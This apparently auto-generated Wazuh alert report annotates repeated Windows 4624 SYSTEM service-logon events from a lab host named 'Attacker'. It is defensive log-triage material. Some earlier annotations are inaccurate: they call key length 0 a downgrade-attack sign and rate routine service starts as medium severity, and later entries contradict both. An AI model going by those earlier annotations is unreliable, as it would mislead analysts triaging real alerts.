type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.079+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.370337
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:38.0009000Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43707
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.147+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.147+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.377673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:38.9779159Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43712
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.312+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.312+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast. T1078 is stamped on every successful‑logon rule, so here it is a label, not a signal: logon type, target account and source decide.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
UK Good Practice Guide 13 (protective monitoring) control IDs. Compliance tag only, not a detection signal.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.385011
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
ETW provider that wrote the event. Every Security‑log audit event (4624, 4625, 4672, 4688, ...) carries this name.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
Fixed GUID of Microsoft-Windows-Security-Auditing, identical on every host; a safe exact‑match filter where the provider name is localised.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4624 = successful logon; its failure twin is 4625, the logoff 4634, and 4672 marks special privileges assigned to the same logon ID.

data.win.system.version:  3
Schema version of the 4624 template. Later versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token, Remote Credential Guard); match on field names, not positions, when agents run mixed Windows builds.

data.win.system.level:  0
Windows event level. Security audit events are always 0 (Log Always); success vs failure is carried by keywords and severityValue instead.

data.win.system.task:  12544
Windows task category. 12544 = Logon, the category of 4624/4625; Logoff events carry 12545.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit flags set by Windows. 0x8020000000000000 = Audit Success, 0x8010000000000000 = Audit Failure; the quick filter, since level is always 0 on Security.

data.win.system.systemTime:  2025-04-20T01:51:47.2593671Z
Time the endpoint wrote the event (UTC). Here it is 2025‑04‑20, more than four days before the alert timestamp, so the agent forwarded a backlog or the clocks disagree. Build the timeline on this value, not on timestamp.

data.win.system.eventRecordID:  43718
Incremental record number in the Security log, handy for timeline order. IDs skipped between consecutive alerts in this report (43719, 43721) were logged but produced no alert or were not forwarded; pull them from the host when reconstructing.

data.win.system.processID:  792
PID of the process that logged the event, i.e. lsass.exe, which writes every Security audit. Not the process that performed the logon; that is eventdata.processId.

data.win.system.threadID:  888
Thread inside that logging process. Only useful for ordering records written in the same instant.

data.win.system.channel:  Security
Event log the record lives in. Security is readable only by SYSTEM/Administrators, so the agent needs those rights; a host that stops sending Security events is itself a finding.

data.win.system.computer:  Attacker
Host that wrote the event. Should equal agent.name; a mismatch means a forwarded event or a renamed host.

data.win.system.severityValue:  AUDIT_SUCCESS
Textual severity. On the Security channel this is AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR; the failure twin of 4624 is 4625.

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
Rendered event text: every eventdata.* value plus Microsoft's standard description of 4624. Query on the parsed fields; read this when a field is left as an unresolved %%code.

data.win.eventdata.subjectUserSid:  S-1-5-18
SID of the account that requested the logon. S-1-5-18 is the well‑known LocalSystem SID, identical on every Windows host.

data.win.eventdata.subjectUserName:  ATTACKER$
Requesting account. The trailing $ marks a computer account, so this is the host itself (agent.name Attacker), not a human user.

data.win.eventdata.subjectDomainName:  WORKGROUP
Domain of the requesting account. WORKGROUP means the host is not domain‑joined, so there are no DC‑side events (4768/4769/4776) to correlate with.

data.win.eventdata.subjectLogonId:  0x3e7
Logon session of the requester. 0x3E7 (999) is the fixed SYSTEM session on every host; 0x3E4 is NETWORK SERVICE and 0x3E5 LOCAL SERVICE. Pivot on this value to see what that session did (4688, 4672, 4634).

data.win.eventdata.targetUserSid:  S-1-5-18
SID of the account that was logged on (the New Logon block). LocalSystem again: SYSTEM requesting a logon as SYSTEM is a service start, not a change of privilege.

data.win.eventdata.targetUserName:  SYSTEM
Account that was logged on. For human logons this is the username to pivot on; here it is the built‑in SYSTEM account.

data.win.eventdata.targetDomainName:  NT AUTHORITY
Domain of the new logon. NT AUTHORITY is the pseudo‑domain of the built‑in accounts (SYSTEM, LOCAL SERVICE, NETWORK SERVICE).

data.win.eventdata.targetLogonId:  0x3e7
Session ID assigned to the new logon; the matching 4634/4647 logoff carries the same value. It equals subjectLogonId here, so no new session was created.

data.win.eventdata.logonType:  5
How the account logged on. 5 = Service: the Service Control Manager starting a service under its configured account. Types that deserve scrutiny: 2 Interactive, 3 Network from a non‑local source, 9 NewCredentials (runas /netonly, also the pass‑the‑hash pattern), 10 RemoteInteractive (RDP), 11 CachedInteractive.

data.win.eventdata.logonProcessName:  Advapi
Trusted logon process that handled the request. Advapi = a local LogonUser() call (services.exe starting a service, runas, scheduled tasks). Console logons show User32; network ones Kerberos or NtLmSsp.

data.win.eventdata.authenticationPackageName:  Negotiate
SSPI package used. Negotiate picks Kerberos when it can and falls back to NTLM; on a non‑domain host with a local SYSTEM logon it carries no signal. NTLM where Kerberos should have worked is the interesting case.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
Ties this logon to the Kerberos ticket event (4769) on the DC. All zeros = no Kerberos ticket involved, expected for a local logon.

data.win.eventdata.keyLength:  0
Length of the session key negotiated for the logon (128 for Kerberos or NTLMv2). 0 means no session key was requested, normal for a local service logon; it is not a weak‑key or downgrade indicator here.

data.win.eventdata.processId:  0x304
PID (hex) of the process that requested the logon: 0x304 = 772. Match it against the services.exe PID in 4688 / Sysmon 1 from the same boot.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
Process that requested the logon. services.exe (the Service Control Manager) creating a SYSTEM type‑5 logon is the textbook service start. Any other binary producing a SYSTEM logon (cmd.exe, powershell.exe, something outside System32) is worth a look.

data.win.eventdata.impersonationLevel:  %%1833
Unresolved message‑table code; the message text renders it as Impersonation Level: Impersonation (the token can act as the user on this host but cannot be forwarded to another). Delegation on a service logon would be the one to question.

data.win.eventdata.virtualAccount:  %%1843
Unresolved code; the message text renders it as Virtual Account: No. Yes would mean a per‑service NT SERVICE\<name> identity rather than a real account.

data.win.eventdata.targetLinkedLogonId:  0x0
For UAC split tokens, the logon ID of the paired session (filtered vs elevated half). 0x0 = no linked session, as for any non‑interactive or SYSTEM logon.

data.win.eventdata.elevatedToken:  %%1842
Unresolved code; the message text renders it as Elevated Token: Yes, i.e. the session holds full administrative rights with no UAC filtering. Expected for SYSTEM. For an admin's interactive logon the elevated and filtered halves each get their own 4624, tied together by targetLinkedLogonId.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.362+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.362+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast. T1078 is stamped on every successful‑logon rule, so here it is a label, not a signal: logon type, target account and source decide.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

